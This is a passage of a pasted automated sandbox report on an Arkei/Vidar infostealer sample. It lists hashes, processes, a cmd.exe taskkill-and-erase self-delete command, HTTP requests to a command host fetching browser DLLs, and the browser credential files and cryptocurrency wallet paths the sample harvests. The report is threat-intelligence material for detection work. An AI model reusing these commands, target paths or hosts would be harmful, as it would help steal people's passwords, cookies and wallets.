API tools faq
paste
Advertisement
paladin316

1273Exes_105f94e56d5fc9fc7555aef13e0af78e_exe_2019-09-06_18_30.txt

paladin316
Sep 6th, 2019
1,905
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 48.70 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 1273
  3. * MalFamily: "Arkei"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_105f94e56d5fc9fc7555aef13e0af78e.exe"
  8. * File Size: 722944
  9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  10. * SHA256: "caec69a18e91839c1a46c79c6b55e68e14ba32ec2f2642a375870f958846fc66"
  11. * MD5: "105f94e56d5fc9fc7555aef13e0af78e"
  12. * SHA1: "3bc068404a65522272c36b64cceb2adcabb04fb6"
  13. * SHA512: "4e9136ad3b3b5b4090668ef66e455fc24e5813789a858018022398a84f018f8d7f41573933c3aecda7689926a4d61a1a1494bc5ed81805fb5848757960e777ae"
  14. * CRC32: "BF36EC09"
  15. * SSDEEP: "12288:RkOEBVhr1go+yrFYnldnYBxXNRKuEBzhUEVNjHZ7BOXO3v9tq5o:RkOEBaozrFYns6/5/JBOWv9I"
  16.  
  17. * Process Execution:
  18. "8JB5A.exe",
  19. "8JB5A.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "WmiPrvSE.exe",
  26. "svchost.exe",
  27. "taskeng.exe",
  28. "taskeng.exe",
  29. "msoia.exe",
  30. "msoia.exe",
  31. "taskeng.exe",
  32. "taskeng.exe",
  33. "WMIADAP.exe"
  34.  
  35.  
  36. * Executed Commands:
  37. "\"C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe\"",
  38. "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
  39. "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
  40. "C:\\Windows\\system32\\lsass.exe",
  41. "taskkill /im 8JB5A.exe /f",
  42. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  43. "taskeng.exe 633E54B2-2944-4AC4-90FA-C69D6C08EDCB S-1-5-18:NT AUTHORITY\\System:Service:",
  44. "taskeng.exe 55EB258C-A9EA-4DA4-A8EF-E736F5A950CE S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  45. "taskeng.exe C47FF73B-279F-4D5D-8B65-FD7750272025 S-1-5-18:NT AUTHORITY\\System:Service:",
  46. "taskeng.exe 67AD5638-AA7B-49DE-8A67-3D392C370D2A S-1-5-18:NT AUTHORITY\\System:Service:",
  47. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
  48. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
  49. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
  50.  
  51.  
  52. * Signatures Detected:
  53.  
  54. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  55. "Details":
  56.  
  57.  
  58. "Description": "Behavioural detection: Executable code extraction",
  59. "Details":
  60.  
  61.  
  62. "Description": "Anomalous file deletion behavior detected (10+)",
  63. "Details":
  64.  
  65. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656"
  66.  
  67.  
  68. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671"
  69.  
  70.  
  71. "DeletedFile": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671"
  72.  
  73.  
  74. "DeletedFile": "C:\\ProgramData\\freebl3.dll"
  75.  
  76.  
  77. "DeletedFile": "C:\\ProgramData\\mozglue.dll"
  78.  
  79.  
  80. "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
  81.  
  82.  
  83. "DeletedFile": "C:\\ProgramData\\nss3.dll"
  84.  
  85.  
  86. "DeletedFile": "C:\\ProgramData\\softokn3.dll"
  87.  
  88.  
  89. "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
  90.  
  91.  
  92. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt"
  93.  
  94.  
  95. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill"
  96.  
  97.  
  98. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt"
  99.  
  100.  
  101. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC"
  102.  
  103.  
  104. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
  105.  
  106.  
  107. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
  108.  
  109.  
  110. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
  111.  
  112.  
  113. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies"
  114.  
  115.  
  116. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt"
  117.  
  118.  
  119. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt"
  120.  
  121.  
  122. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads"
  123.  
  124.  
  125. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt"
  126.  
  127.  
  128. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History"
  129.  
  130.  
  131. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt"
  132.  
  133.  
  134. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt"
  135.  
  136.  
  137. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg"
  138.  
  139.  
  140. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy"
  141.  
  142.  
  143. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft"
  144.  
  145.  
  146. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin"
  147.  
  148.  
  149. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin"
  150.  
  151.  
  152. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin"
  153.  
  154.  
  155. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore"
  156.  
  157.  
  158. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin"
  159.  
  160.  
  161. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin"
  162.  
  163.  
  164. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash"
  165.  
  166.  
  167. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum"
  168.  
  169.  
  170. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC"
  171.  
  172.  
  173. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum"
  174.  
  175.  
  176. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus"
  177.  
  178.  
  179. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin"
  180.  
  181.  
  182. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko"
  183.  
  184.  
  185. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin"
  186.  
  187.  
  188. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD"
  189.  
  190.  
  191. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin"
  192.  
  193.  
  194. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin"
  195.  
  196.  
  197. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin"
  198.  
  199.  
  200. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX"
  201.  
  202.  
  203. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin"
  204.  
  205.  
  206. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin"
  207.  
  208.  
  209. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin"
  210.  
  211.  
  212. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge"
  213.  
  214.  
  215. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin"
  216.  
  217.  
  218. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin"
  219.  
  220.  
  221. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin"
  222.  
  223.  
  224. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin"
  225.  
  226.  
  227. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash"
  228.  
  229.  
  230. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets"
  231.  
  232.  
  233. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip"
  234.  
  235.  
  236. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe"
  237.  
  238.  
  239. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  240.  
  241.  
  242.  
  243.  
  244. "Description": "Guard pages use detected - possible anti-debugging.",
  245. "Details":
  246.  
  247.  
  248. "Description": "A process attempted to delay the analysis task.",
  249. "Details":
  250.  
  251. "Process": "taskeng.exe tried to sleep 481 seconds, actually delayed analysis time by 0 seconds"
  252.  
  253.  
  254. "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  255.  
  256.  
  257.  
  258.  
  259. "Description": "Performs HTTP requests potentially not found in PCAP.",
  260. "Details":
  261.  
  262. "url_ioc": "dersed.com:80//288"
  263.  
  264.  
  265. "url_ioc": "dersed.com:80//freebl3.dll"
  266.  
  267.  
  268. "url_ioc": "dersed.com:80//mozglue.dll"
  269.  
  270.  
  271. "url_ioc": "dersed.com:80//msvcp140.dll"
  272.  
  273.  
  274. "url_ioc": "dersed.com:80//nss3.dll"
  275.  
  276.  
  277. "url_ioc": "dersed.com:80//softokn3.dll"
  278.  
  279.  
  280. "url_ioc": "dersed.com:80//vcruntime140.dll"
  281.  
  282.  
  283. "url_ioc": "ip-api.com:80//line/"
  284.  
  285.  
  286.  
  287.  
  288. "Description": "A process created a hidden window",
  289. "Details":
  290.  
  291. "Process": "8JB5A.exe -> C:\\Windows\\System32\\cmd.exe"
  292.  
  293.  
  294.  
  295.  
  296. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  297. "Details":
  298.  
  299. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  300.  
  301.  
  302. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  303.  
  304.  
  305. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  306.  
  307.  
  308. "suspicious_request_iocs": "http://dersed.com/288"
  309.  
  310.  
  311. "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
  312.  
  313.  
  314. "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
  315.  
  316.  
  317. "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
  318.  
  319.  
  320. "suspicious_request_iocs": "http://dersed.com/nss3.dll"
  321.  
  322.  
  323. "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
  324.  
  325.  
  326. "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
  327.  
  328.  
  329. "suspicious_request_iocs": "http://ip-api.com/line/"
  330.  
  331.  
  332. "suspicious_request_iocs": "http://dersed.com/"
  333.  
  334.  
  335.  
  336.  
  337. "Description": "Performs some HTTP requests",
  338. "Details":
  339.  
  340. "url_iocs": "http://dersed.com/288"
  341.  
  342.  
  343. "url_iocs": "http://dersed.com/freebl3.dll"
  344.  
  345.  
  346. "url_iocs": "http://dersed.com/mozglue.dll"
  347.  
  348.  
  349. "url_iocs": "http://dersed.com/msvcp140.dll"
  350.  
  351.  
  352. "url_iocs": "http://dersed.com/nss3.dll"
  353.  
  354.  
  355. "url_iocs": "http://dersed.com/softokn3.dll"
  356.  
  357.  
  358. "url_iocs": "http://dersed.com/vcruntime140.dll"
  359.  
  360.  
  361. "url_iocs": "http://ip-api.com/line/"
  362.  
  363.  
  364. "url_iocs": "http://dersed.com/"
  365.  
  366.  
  367.  
  368.  
  369. "Description": "The binary likely contains encrypted or compressed data.",
  370. "Details":
  371.  
  372. "section": "name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x000afc00, virtual_size: 0x000afa54"
  373.  
  374.  
  375.  
  376.  
  377. "Description": "Uses Windows utilities for basic functionality",
  378. "Details":
  379.  
  380. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  381.  
  382.  
  383. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  384.  
  385.  
  386. "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  387.  
  388.  
  389.  
  390.  
  391. "Description": "Behavioural detection: Injection (Process Hollowing)",
  392. "Details":
  393.  
  394. "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
  395.  
  396.  
  397.  
  398.  
  399. "Description": "Executed a process and injected code into it, probably while unpacking",
  400. "Details":
  401.  
  402. "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
  403.  
  404.  
  405.  
  406.  
  407. "Description": "Deletes its original binary from disk",
  408. "Details":
  409.  
  410.  
  411. "Description": "Behavioural detection: Injection (inter-process)",
  412. "Details":
  413.  
  414.  
  415. "Description": "Steals private information from local Internet browsers",
  416. "Details":
  417.  
  418. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  419.  
  420.  
  421. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  422.  
  423.  
  424. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
  425.  
  426.  
  427. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
  428.  
  429.  
  430. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
  431.  
  432.  
  433. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  434.  
  435.  
  436. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  437.  
  438.  
  439.  
  440.  
  441. "Description": "Collects information about installed applications",
  442. "Details":
  443.  
  444. "Program": "Google Update Helper"
  445.  
  446.  
  447. "Program": "Microsoft Excel MUI 2013"
  448.  
  449.  
  450. "Program": "Microsoft Outlook MUI 2013"
  451.  
  452.  
  453.  
  454.  
  455. "Program": "Google Chrome"
  456.  
  457.  
  458. "Program": "Adobe Flash Player 29 NPAPI"
  459.  
  460.  
  461. "Program": "Adobe Flash Player 29 ActiveX"
  462.  
  463.  
  464. "Program": "Microsoft DCF MUI 2013"
  465.  
  466.  
  467. "Program": "Microsoft Access MUI 2013"
  468.  
  469.  
  470. "Program": "Microsoft Office Proofing Tools 2013 - English"
  471.  
  472.  
  473. "Program": "Adobe Acrobat Reader DC"
  474.  
  475.  
  476. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  477.  
  478.  
  479. "Program": "Microsoft Publisher MUI 2013"
  480.  
  481.  
  482. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  483.  
  484.  
  485. "Program": "Microsoft Office Shared MUI 2013"
  486.  
  487.  
  488. "Program": "Microsoft Office OSM MUI 2013"
  489.  
  490.  
  491. "Program": "Microsoft InfoPath MUI 2013"
  492.  
  493.  
  494. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  495.  
  496.  
  497. "Program": "Microsoft Word MUI 2013"
  498.  
  499.  
  500. "Program": "Microsoft Groove MUI 2013"
  501.  
  502.  
  503.  
  504.  
  505. "Program": "Microsoft Access Setup Metadata MUI 2013"
  506.  
  507.  
  508. "Program": "Microsoft Office OSM UX MUI 2013"
  509.  
  510.  
  511. "Program": "Java Auto Updater"
  512.  
  513.  
  514. "Program": "Microsoft PowerPoint MUI 2013"
  515.  
  516.  
  517. "Program": "Microsoft Office Professional Plus 2013"
  518.  
  519.  
  520. "Program": "Adobe Refresh Manager"
  521.  
  522.  
  523. "Program": "Microsoft Office Proofing 2013"
  524.  
  525.  
  526. "Program": "Microsoft Lync MUI 2013"
  527.  
  528.  
  529.  
  530.  
  531. "Program": "Microsoft OneNote MUI 2013"
  532.  
  533.  
  534.  
  535.  
  536. "Description": "Stack pivoting was detected when using a critical API",
  537. "Details":
  538.  
  539. "process": "WmiPrvSE.exe:3968"
  540.  
  541.  
  542.  
  543.  
  544. "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
  545. "Details":
  546.  
  547. "MicroWorld-eScan": "Trojan.GenericKD.32387802"
  548.  
  549.  
  550. "FireEye": "Generic.mg.105f94e56d5fc9fc"
  551.  
  552.  
  553. "McAfee": "RDN/Generic.grp"
  554.  
  555.  
  556. "AegisLab": "Trojan.MSIL.Chapak.4!c"
  557.  
  558.  
  559. "K7AntiVirus": "Trojan ( 005573d61 )"
  560.  
  561.  
  562. "K7GW": "Trojan ( 005573d61 )"
  563.  
  564.  
  565. "Cybereason": "malicious.04a655"
  566.  
  567.  
  568. "Arcabit": "Trojan.Generic.D1EE32DA"
  569.  
  570.  
  571. "Invincea": "heuristic"
  572.  
  573.  
  574. "Symantec": "ML.Attribute.HighConfidence"
  575.  
  576.  
  577. "APEX": "Malicious"
  578.  
  579.  
  580. "Paloalto": "generic.ml"
  581.  
  582.  
  583. "Kaspersky": "HEUR:Trojan.MSIL.Chapak.gen"
  584.  
  585.  
  586. "BitDefender": "Trojan.GenericKD.32387802"
  587.  
  588.  
  589. "Avast": "Win32:Trojan-gen"
  590.  
  591.  
  592. "Ad-Aware": "Trojan.GenericKD.32387802"
  593.  
  594.  
  595. "Sophos": "Mal/Generic-S"
  596.  
  597.  
  598. "DrWeb": "Trojan.Inject3.20236"
  599.  
  600.  
  601. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.bc"
  602.  
  603.  
  604. "Emsisoft": "Trojan.GenericKD.32387802 (B)"
  605.  
  606.  
  607. "SentinelOne": "DFI - Malicious PE"
  608.  
  609.  
  610. "Microsoft": "Trojan:MSIL/CryptInject"
  611.  
  612.  
  613. "Endgame": "malicious (moderate confidence)"
  614.  
  615.  
  616. "ZoneAlarm": "HEUR:Trojan.MSIL.Chapak.gen"
  617.  
  618.  
  619. "GData": "Trojan.GenericKD.32387802"
  620.  
  621.  
  622. "Acronis": "suspicious"
  623.  
  624.  
  625. "MAX": "malware (ai score=100)"
  626.  
  627.  
  628. "Malwarebytes": "Spyware.Vidar"
  629.  
  630.  
  631. "ESET-NOD32": "a variant of Generik.LSRSOXR"
  632.  
  633.  
  634. "Ikarus": "Trojan.SuspectCRC"
  635.  
  636.  
  637. "MaxSecure": "Trojan.Malware.300983.susgen"
  638.  
  639.  
  640. "Fortinet": "MSIL/Malicious_Behavior.VEX"
  641.  
  642.  
  643. "Webroot": "W32.Trojan.Emotet"
  644.  
  645.  
  646. "AVG": "Win32:Trojan-gen"
  647.  
  648.  
  649. "Panda": "Trj/GdSda.A"
  650.  
  651.  
  652. "CrowdStrike": "win/malicious_confidence_100% (W)"
  653.  
  654.  
  655. "Qihoo-360": "Win32/Trojan.973"
  656.  
  657.  
  658.  
  659.  
  660. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  661. "Details":
  662.  
  663.  
  664. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  665. "Details":
  666.  
  667. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  668.  
  669.  
  670. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12"
  671.  
  672.  
  673. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\*.*"
  674.  
  675.  
  676. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
  677.  
  678.  
  679. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n"
  680.  
  681.  
  682. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  683.  
  684.  
  685. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  686.  
  687.  
  688. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\*.*"
  689.  
  690.  
  691. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  692.  
  693.  
  694. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\*.*"
  695.  
  696.  
  697. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\"
  698.  
  699.  
  700. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  701.  
  702.  
  703. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\*.*"
  704.  
  705.  
  706. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\"
  707.  
  708.  
  709. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  710.  
  711.  
  712. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  713.  
  714.  
  715. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  716.  
  717.  
  718. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\"
  719.  
  720.  
  721. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\*.*"
  722.  
  723.  
  724. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  725.  
  726.  
  727. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\*.*"
  728.  
  729.  
  730. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  731.  
  732.  
  733. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  734.  
  735.  
  736. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\"
  737.  
  738.  
  739. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  740.  
  741.  
  742. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\*.*"
  743.  
  744.  
  745. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  746.  
  747.  
  748. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\"
  749.  
  750.  
  751. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\"
  752.  
  753.  
  754. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  755.  
  756.  
  757. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  758.  
  759.  
  760. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\*.*"
  761.  
  762.  
  763. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  764.  
  765.  
  766. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\*.*"
  767.  
  768.  
  769. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\"
  770.  
  771.  
  772. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  773.  
  774.  
  775. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  776.  
  777.  
  778. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\"
  779.  
  780.  
  781. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\*.*"
  782.  
  783.  
  784. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  785.  
  786.  
  787. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  788.  
  789.  
  790. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  791.  
  792.  
  793. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\"
  794.  
  795.  
  796. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\*.*"
  797.  
  798.  
  799. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\"
  800.  
  801.  
  802. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  803.  
  804.  
  805. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\*.*"
  806.  
  807.  
  808. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  809.  
  810.  
  811. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\*.*"
  812.  
  813.  
  814. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  815.  
  816.  
  817. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  818.  
  819.  
  820. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\"
  821.  
  822.  
  823. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  824.  
  825.  
  826. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\"
  827.  
  828.  
